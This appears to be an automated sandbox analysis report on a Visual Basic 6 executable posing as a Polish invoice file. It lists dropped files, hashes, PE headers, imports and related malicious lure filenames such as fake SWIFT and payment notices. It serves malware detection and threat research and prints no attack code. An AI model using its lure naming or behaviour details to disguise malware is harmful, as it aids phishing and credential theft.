                                                    • Excluded domains from analysis (whitelisted): definitionupdates.microsoft.com.edgekey.net, fg.download.windowsupdate.com.c.footprint.net, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, e13678.dscb.akamaiedge.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net, fe3.delivery.dsp.mp.microsoft.com.nsatc.net, e11290.dspg.akamaiedge.net, wns.notify.trafficmanager.net, www.microsoft.com-c-3.edgekey.net, go.microsoft.com, arc.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, slscr.update.microsoft.com.akadns.net, crl.root-x1.letsencrypt.org.edgekey.net, definitionupdates.microsoft.com, client.wns.windows.com, fs.microsoft.com, e3673.g.akamaiedge.net, sls.update.microsoft.com.akadns.net, wu-shim.trafficmanager.net, wd-prod-cp-eu-north-2-fe.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, wdcp.microsoft.com, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, wd-prod-cp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, sls.emea.update.microsoft.com.akadns.net, wdcpalt.microsoft.com, fe3.delivery.mp.microsoft.com, go.microsoft.com.edgekey.net, wd-prod-cp-eu-west-2-fe.westeurope.cloudapp.azure.com, www.microsoft.com
                                                    • Not all processes were analyzed, report is missing behavior information
                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                    • Report size getting too big, too many NtEnumerateKey calls found.
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                    • Report size getting too big, too many NtSetInformationFile calls found.

                                                    Simulations

                                                    Behavior and APIs

                                                    Time | Type | Description
                                                    16:36:01 | API Interceptor | 2658x Sleep call for process: RegAsm.exe modified

                                                    Joe Sandbox View / Context

                                                    IPs


                                                                                            Domains


                                                                                            ASN


                                                                                            JA3 Fingerprints


                                                                                            Dropped Files


                                                                                                                              Created / dropped Files

                                                                                                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1391
                                                                                                                              Entropy (8bit):7.705940075877404
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                                                                              MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                                                                              SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                                                                              SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                                                                              SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                                                                              Malicious:false
                                                                                                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                              File Type:Microsoft Cabinet archive data, 61157 bytes, 1 file
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):61157
                                                                                                                              Entropy (8bit):7.995991509218449
                                                                                                                              Encrypted:true
                                                                                                                              SSDEEP:1536:ppUkcaDREfLNPj1tHqn+ZQgYXAMxCbG0Ra0HMSAKMgAAaE1k:7UXaDR0NPj1Vi++xQFa07sTgAQ1k
                                                                                                                              MD5:AB5C36D10261C173C5896F3478CDC6B7
                                                                                                                              SHA1:87AC53810AD125663519E944BC87DED3979CBEE4
                                                                                                                              SHA-256:F8E90FB0557FE49D7702CFB506312AC0B24C97802F9C782696DB6D47F434E8E9
                                                                                                                              SHA-512:E83E4EAE44E7A9CBCD267DBFC25A7F4F68B50591E3BBE267324B1F813C9220D565B284994DED5F7D2D371D50E1EBFA647176EC8DE9716F754C6B5785C6E897FA
                                                                                                                              Malicious:false
                                                                                                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):192
                                                                                                                              Entropy (8bit):2.773803200765873
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:kkFklhykfllXlE/zMcSllh/tNNX8RolJuRdyo1dlUKlGXJlDdt:kKz1I7NMa8Rdy+UKcXP
                                                                                                                              MD5:F80B71C89A3E6AC19F330E1FFF75B8DC
                                                                                                                              SHA1:0DED612CA4F8FE979B01215DD5541401D34799C8
                                                                                                                              SHA-256:4658A75A82042D0BCEB4DA7BF48C4AF32E39EFD1412F9C7C375E174BB24DB89A
                                                                                                                              SHA-512:2F9F0A0689F207CA29C72FC8F61219A1F812AC9947133BC4238C68F66A698DDE812EE70318119126E219FC9AA61B799712D10F81047A0B860FEC3351AAE67BEB
                                                                                                                              Malicious:false
                                                                                                                              Preview: p... http://x1.i.lencr.org/ ... "5a62815c-56f" ...
                                                                                                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                              File Type:data
                                                                                                                              Category:modified
                                                                                                                              Size (bytes):326
                                                                                                                              Entropy (8bit):3.102288469951472
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:kKwdFN+SkQlPlEGYRMY9z+4KlDA3RUeOlEfcTt:62kPlE99SNxAhUefit
                                                                                                                              MD5:F4A7236428EC4897A7C3CEE487D5FD13
                                                                                                                              SHA1:043C09FA870F934398CD70A2BA5206C03BCBE187
                                                                                                                              SHA-256:275BC2A37B4A17304489B33445FA52A722BFCADF09AE419D8B9329CCA541B6EF
                                                                                                                              SHA-512:4AECACE983B7AA6E9BC1992035E74C0315293743BCBE1236D77D286826A07A031BA40AD2362345B39B33FBD52CADA4ED64CE680BEA94523617F0DBEBCA738D6C
                                                                                                                              Malicious:false
                                                                                                                              Preview: p... http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab ... "0aa8a15ea6d71:0" ...
                                                                                                                              C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\1.1.18500.10_to_1.1.18600.4_mpengine.dll._p
                                                                                                                              Process:C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-51041e98.exe
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2651471
                                                                                                                              Entropy (8bit):7.999536893169429
                                                                                                                              Encrypted:true
                                                                                                                              SSDEEP:49152:PATHbjm/iIcfAPkDFdv14M/XGgXqzwoDXK0wo2Ufj8BYuMmLNaCvruHEmWE:PgbHIvq/vlPGgap60PJ8TJaGrMOE
                                                                                                                              MD5:15BC5469BEBD01AD2E2A53F66D88D920
                                                                                                                              SHA1:123EA8DFF16F084DC27352CE1A10D723F9833874
                                                                                                                              SHA-256:623CA36626BACABBDD43740F875A2FE04DD3D5881CBB978FA53848202AB4F9B7
                                                                                                                              SHA-512:46DBA1D21EF2D1891D16C08A4BF0051E14B951BE04355EC2F20F5E9CF1AB707BCD2577B63955C586E53B86F3B6B53B6AB2409E0DE47795359186FA2362C3A2F0
                                                                                                                              Malicious:false
                                                                                                                              C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\1.349.0.0_to_1.351.0.0_mpasbase.vdm._p
                                                                                                                              Process:C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-51041e98.exe
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):6947288
                                                                                                                              Entropy (8bit):7.998652520745969
                                                                                                                              Encrypted:true
                                                                                                                              SSDEEP:196608:Z6h8S1WVWjjc7Wf7zlW0qg2eUCJj6oZT32FBN6DIz:M+S1q7S7BWvMzJxBYHz
                                                                                                                              MD5:46F037977005B7E9F8711C1CE7245C6B
                                                                                                                              SHA1:B04BB6DE0F9F5A2B12C52124AD514D324EF3B616
                                                                                                                              SHA-256:3D38C95836DB5540D4354BDA13A83091BF144A907A831604898D9F864126A4D0
                                                                                                                              SHA-512:8D84FDCE9A81422A10AA1CC6B450EEA1E593F16DBF57D00A313C3AA9B03BB41F6A94FF8D4739C1ED79B3ED6F1CBF203F455BCCE6654C103BB5294599E47CDC16
                                                                                                                              Malicious:false
                                                                                                                              C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\1.349.0.0_to_1.351.0.0_mpavbase.vdm._p
                                                                                                                              Process:C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-51041e98.exe
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):5295896
                                                                                                                              Entropy (8bit):7.997749364950445
                                                                                                                              Encrypted:true
                                                                                                                              SSDEEP:98304:+3t2My1jJFqD1nlxmI5zN8KGixmH8l2snrho+qico1hSWmnSEOR69MaKJD:+92M8DqTx/dN81iUHooKcofHDZEMaKJD
                                                                                                                              MD5:F2E9F2343E044B331ECAF82302F5EC4B
                                                                                                                              SHA1:049E866B3C7385DD7B00BBEC39453C30B8D29C28
                                                                                                                              SHA-256:77AF289327742CC4F520092AA6429A5B829E24F40653DF71D00E31EFF9F3737F
                                                                                                                              SHA-512:080509E98915BE390AE6A1ABA880248E98DE10D77AF107FB266DC34CECD43EED9CE77F53C6568C20FA1222DBA1D3FDB79E820656C0B28E1316DA93500C580A79
                                                                                                                              Malicious:false
                                                                                                                              C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\MpSigStub.exe
                                                                                                                              Process:C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-51041e98.exe
                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):803176
                                                                                                                              Entropy (8bit):6.37118649960636
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24576:Ghj1QlBYDgtUUvie3n+pB3+ojRlcD1VyZTFXk:GhpQlBHtBYla1VyZpU
                                                                                                                              MD5:01F92DC7A766FF783AE7AF40FD0334FB
                                                                                                                              SHA1:45D7B8E98E22F939ED0083FE31204CAA9A72FA76
                                                                                                                              SHA-256:FA42B9B84754E2E8368E8929FA045BE86DBD72678176EE75814D2A16D23E5C26
                                                                                                                              SHA-512:BEA5F3D7FB0984C4A71720F25644CE3151FCDC95586E1E2FFE804D04567AAF30D8678608110E241C7DDF908F94882EDDD84A994573B0C808D1C064F0E135A583
                                                                                                                              Malicious:false
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: Metadefender, Detection: 0%
                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                              Joe Sandbox View:
                                                                                                                              • Filename: Foreign_Bank Account Details.exe, Detection: malicious
                                                                                                                              • Filename: Arrival_Notice-AutonotificationimportsEUR-sealandmaersk.com_october2021.vbs, Detection: malicious
                                                                                                                              • Filename: 1gPmnCR2PX.exe, Detection: malicious
                                                                                                                              • Filename: FACTURA.exe, Detection: malicious
                                                                                                                              • Filename: l8w9YB1n38.exe, Detection: malicious
                                                                                                                              • Filename: Monex Payment Declined CTE21081157582 EUR 81300.00_PDF.exe, Detection: malicious
                                                                                                                              • Filename: Udtrt.exe, Detection: malicious
                                                                                                                              • Filename: MT103_SWIFT.exe, Detection: malicious
                                                                                                                              • Filename: MT103_SWIFT.exe, Detection: malicious
                                                                                                                              • Filename: EVOLUTION TRADE Sp. z o.o. OFERTA 09212.exe, Detection: malicious
                                                                                                                              • Filename: tZz20galQf.exe, Detection: malicious
                                                                                                                              • Filename: Guloader.exe, Detection: malicious
                                                                                                                              • Filename: 8hIPR0n66X.dll, Detection: malicious
                                                                                                                              • Filename: Struggleres5.exe, Detection: malicious
                                                                                                                              • Filename: FACTURA.exe, Detection: malicious
                                                                                                                              • Filename: LISTA DE PEDIDO DE COMPRA.exe, Detection: malicious
                                                                                                                              • Filename: Unreal.exe, Detection: malicious
                                                                                                                              C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\mpasbase.vdm
                                                                                                                              Process:C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\MpSigStub.exe
                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):53072304
                                                                                                                              Entropy (8bit):7.997563930648501
                                                                                                                              Encrypted:true
                                                                                                                              SSDEEP:1572864:P0U1SslLDBQpTRKb0o76I0RUgRS2uc62zNWPy:P0UplL2tRW0aV0RpS2lTey
                                                                                                                              MD5:0157CF1D00DB2F06270440CED26AD2DA
                                                                                                                              SHA1:E0DA67E235AF6B8DDBA9736504E7638BFF4DB4B0
                                                                                                                              SHA-256:15C43FFD2F73BA5E6A0E0A3B845A6FD61EE9E12220C0D98CBDB9E59D6E188914
                                                                                                                              SHA-512:0264329D824734BC9BFE3129E4653E5293EFC96555EE98909DD19B37A010747C6368247784972AE478DBC16EF5E031FF99A283CF371F21278DBCE9E94DABAAC5
                                                                                                                              Malicious:false
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                              C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\mpasdlta.vdm
                                                                                                                              Process:C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-51041e98.exe
                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):590768
                                                                                                                              Entropy (8bit):7.995607164320088
                                                                                                                              Encrypted:true
                                                                                                                              SSDEEP:12288:jelAo91I34Dl7OSom9zYukvli2CtLTN0dEyG/ryzIAg2Y8i+Mm:iGGRhOoJYq2CtL6G/rCj9Mm
                                                                                                                              MD5:D3D8F863952CE10ADE4319482D4A5B28
                                                                                                                              SHA1:F655FC23421E4EEDCD18AEBF8FB6E9F439BC686F
                                                                                                                              SHA-256:B4EE6BF3E98991CADB83614425214C45883C7E6C924562A55E3D4B25E69A6A62
                                                                                                                              SHA-512:C6199B6108B6CB8FE428DD5E3AE7BB19D58E182DFA5DEF87921630D29BEC5E0CA057CA6DD0872058ADC0D0EBAA98B0295A8780AE74400B6A33C38E5EB38B8BB5
                                                                                                                              Malicious:false
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                              C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\mpavbase.vdm
                                                                                                                              Process:C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\MpSigStub.exe
                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):55848880
                                                                                                                              Entropy (8bit):7.995585481148423
                                                                                                                              Encrypted:true
                                                                                                                              SSDEEP:1572864:iy6w1liQqicAsNBasl5IY/hOO0S7WGB9F9L4hxZB:B6uiQqiTE8kIYJn+wFZ4XB
                                                                                                                              MD5:7E2B83A39CC26B2B617F404A89B6661C
                                                                                                                              SHA1:198F9D59A90993247182EE11AE33AB52E5011C44
                                                                                                                              SHA-256:8ED02ED1D817FA7B68466F11F55A2289D82BDD22A360246624BA0F9220D17EE3
                                                                                                                              SHA-512:BF29A223DFF577DB8967DBEA610DC6DB2D6C0152A896E8BCC851EB67E84AF5367E4A01AC6110554C2813E974EBA9B8C04C2EB03422DCCDE00B1FA8D7F629C55F
                                                                                                                              Malicious:false
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                              C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\mpavdlta.vdm
                                                                                                                              Process:C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-51041e98.exe
                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                              Category:modified
                                                                                                                              Size (bytes):235440
                                                                                                                              Entropy (8bit):7.989341625913562
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3072:d3zk2No0flLXRzgF5+8/ofRoVjzx6/G2P4ddYRS848A6RqxC4UPJGCsYjBWW:dkV0dA+8co0GWm4dk6ROCJPJG+BWW
                                                                                                                              MD5:C5974E8FEC38D3E17E0D6DC44D69B397
                                                                                                                              SHA1:24640A78C49B2CCDF418D2164406FD528F5DF7B6
                                                                                                                              SHA-256:653C1A629CEA89264D0BAF8BC5526E27D301FD700D78CA57D1B2F403C669EE3E
                                                                                                                              SHA-512:56E393FED8C0D69DB251FB7E6BA450D887D0568757301565EDF121C37250898ECB68264CA5E2077BB7E71103B0BF04F9638CD092B12519D92412F0743AD89F30
                                                                                                                              Malicious:false
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                              C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\MpSigStub.log
                                                                                                                              Process:C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\MpSigStub.exe
                                                                                                                              File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                                                                                                              Category:modified
                                                                                                                              Size (bytes):10420
                                                                                                                              Entropy (8bit):3.427461400203551
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:96:BnwD21YmA2KxoZvHoBQE0KAK3ERK5W7i1zBe0KAK3ERK5Wgvdikynvz5fsDXycc:xshD2Kx0HosrcERohrrcERorzyrBs23
                                                                                                                              MD5:BC7558BEEF83A62D1C0384D161F8BFA8
                                                                                                                              SHA1:B1706CF275610F7D51A16D847EE2B2335FE8184F
                                                                                                                              SHA-256:D51C3268988C2168A03A323EFA1D47171BB5A833AB06F5F9CC96FE351DFF93DE
                                                                                                                              SHA-512:C39DBAEF1E6B87EE9E3F57373FA782147A135BD9796032B1C72020AC49B667B9AF6EE8DCB088E14440B7D6452F5479C0362B5C715744B1A7D3F88A75C479EA45
                                                                                                                              Malicious:false
                                                                                                                              Preview: ..-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....S.t.a.r.t. .t.i.m.e.:. .2.0.2.1.-.1.0.-.1.2. .1.5.:.4.1.:.5.0.Z.....P.r.o.c.e.s.s.:. .1.b.d.0...1.d.7.b.f.7.f.a.c.8.9.6.9.f.b.....C.o.m.m.a.n.d.:. ./.s.t.u.b. .1...1...1.8.5.0.0...1.0. ./.p.a.y.l.o.a.d. .1...3.5.1...2.6.5...0. ./.p.r.o.g.r.a.m. .C.:.\.W.i.n.d.o.w.s.\.S.E.R.V.I.C.~.1.\.N.E.T.W.O.R.~.1.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.m.p.a.m.-.5.1.0.4.1.e.9.8...e.x.e. ./.q. .W.D.....A.d.m.i.n.i.s.t.r.a.t.o.r.:. .n.o.....V.e.r.s.i.o.n.:. .1...1...1.8.5.0.0...1.0.........=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=. .P.r.o.d.u.c.t.S.e.a.r.c.h. .=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=......... . . . . . . . . . . . . . . .M.i.c.r.o.s.o.f.t. .W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r. .(.R.S.1.+.).:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..... . . . . . . .S.t.a.t.u.
                                                                                                                              \Device\ConDrv
                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):30
                                                                                                                              Entropy (8bit):3.964735178725505
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:IBVFBWAGRHneyy:ITqAGRHner
                                                                                                                              MD5:9F754B47B351EF0FC32527B541420595
                                                                                                                              SHA1:006C66220B33E98C725B73495FE97B3291CE14D9
                                                                                                                              SHA-256:0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
                                                                                                                              SHA-512:C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
                                                                                                                              Malicious:false
                                                                                                                              Preview: NordVPN directory not found!..

                                                                                                                              Static File Info

                                                                                                                              General

                                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                              Entropy (8bit):5.864427344075375
                                                                                                                              TrID:
                                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.15%
                                                                                                                              • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                              File name:FAKTURA I PARAGONY.exe
                                                                                                                              File size:102400
                                                                                                                              MD5:0277ce10266c718b31d46a622acf1a43
                                                                                                                              SHA1:f9a05406e2407434e5359a8757d6f2bf0166b20e
                                                                                                                              SHA256:1113efa42a416df493d712368060e751482e644c13f6c115a507ff001a322724
                                                                                                                              SHA512:d95b4f43700508396a222d44e184846e5d48d3d6890899341c071d1be0d0c4bc29eb3a8aaae04127fad1e575bcaa4570cd556be0399404ba86abca357b3c1ff4
                                                                                                                              SSDEEP:1536:tSDzKtMbun1t/WkXDEMlkZk7+QqwshFka4vrQD7ni6D:tSfqPzoUp+QshetC7i6
                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i.......................*..............Rich....................PE..L...>U=T.................P...0......x........`....@........

                                                                                                                              File Icon

                                                                                                                              Icon Hash:69e1c892f664c884

                                                                                                                              Static PE Info

                                                                                                                              General

                                                                                                                              Entrypoint:0x401378
                                                                                                                              Entrypoint Section:.text
                                                                                                                              Digitally signed:false
                                                                                                                              Imagebase:0x400000
                                                                                                                              Subsystem:windows gui
                                                                                                                              Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                                                              DLL Characteristics:
                                                                                                                              Time Stamp:0x543D553E [Tue Oct 14 16:54:22 2014 UTC]
                                                                                                                              TLS Callbacks:
                                                                                                                              CLR (.Net) Version:
                                                                                                                              OS Version Major:4
                                                                                                                              OS Version Minor:0
                                                                                                                              File Version Major:4
                                                                                                                              File Version Minor:0
                                                                                                                              Subsystem Version Major:4
                                                                                                                              Subsystem Version Minor:0
                                                                                                                              Import Hash:669316531b5190f02843878b6ed87394

                                                                                                                              Entrypoint Preview

                                                                                                                              Instruction
                                                                                                                              push 0041060Ch
                                                                                                                              call 00007F1810FA2115h
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              xor byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              cmp byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              inc ecx
                                                                                                                              adc eax, B1D9BBEAh
                                                                                                                              jns 00007F1810FA2171h

                                                                                                                              Data Directories

                                                                                                                              Name | Virtual Address | Virtual Size | Is in Section
                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT | 0x15344 | 0x28 | .text
                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x17000 | 0x1cba | .rsrc
                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x230 | 0x20 |
                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0x134 | .text
                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                                                                                                              Sections

                                                                                                                              Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                                                                                              .text | 0x1000 | 0x147f8 | 0x15000 | False | 0.504417782738 | data | 6.30107135382 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                              .data | 0x16000 | 0xd0c | 0x1000 | False | 0.00634765625 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                              .rsrc | 0x17000 | 0x1cba | 0x2000 | False | 0.348876953125 | data | 3.77024898277 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name | RVA | Size | Type | Language | Country
CUSTOM | 0x189bc | 0x2fe | MS Windows icon resource - 1 icon, 32x32, 16 colors | English | United States
CUSTOM | 0x180fe | 0x8be | MS Windows icon resource - 1 icon, 32x32, 8 bits/pixel | English | United States
CUSTOM | 0x17e00 | 0x2fe | MS Windows icon resource - 1 icon, 32x32, 16 colors, 4 bits/pixel | English | United States
RT_ICON | 0x17558 | 0x8a8 | data | |
RT_GROUP_ICON | 0x17544 | 0x14 | data | |
RT_VERSION | 0x171a0 | 0x3a4 | data | English | United States

Imports

DLL | Import
MSVBVM60.DLL | _CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, _adj_fdiv_m64, _adj_fprem1, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, _adj_fdiv_m16i, _adj_fdivr_m16i, __vbaVarTstLt, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaStrCmp, DllFunctionCall, _adj_fpatan, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaStrVarVal, __vbaDateVar, _CIlog, __vbaErrorOverflow, __vbaFileOpen, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaLateMemCall, __vbaVarAdd, __vbaStrToAnsi, __vbaVarDup, __vbaFpI4, _CIatan, __vbaStrMove, _allmul, __vbaLateIdSt, _CItan, _CIexp, __vbaFreeStr, __vbaFreeObj

Version Infos

Description | Data
Translation | 0x0409 0x04b0
LegalCopyright | Collides Systems, Inc.
InternalName | PYRAMIDLIKE
FileVersion | 4.00
CompanyName | Collides Systems, Inc.
LegalTrademarks | Collides Systems, Inc.
Comments | Collides Systems, Inc.
ProductName | Collides Systems, Inc.
ProductVersion | 4.00
FileDescription | Collides Systems, Inc.
OriginalFilename | PYRAMIDLIKE.exe

Possible Origin

Language of compilation system | Country where language is spoken
English | United States

Network Behavior

TCP Packets

UDP Packets

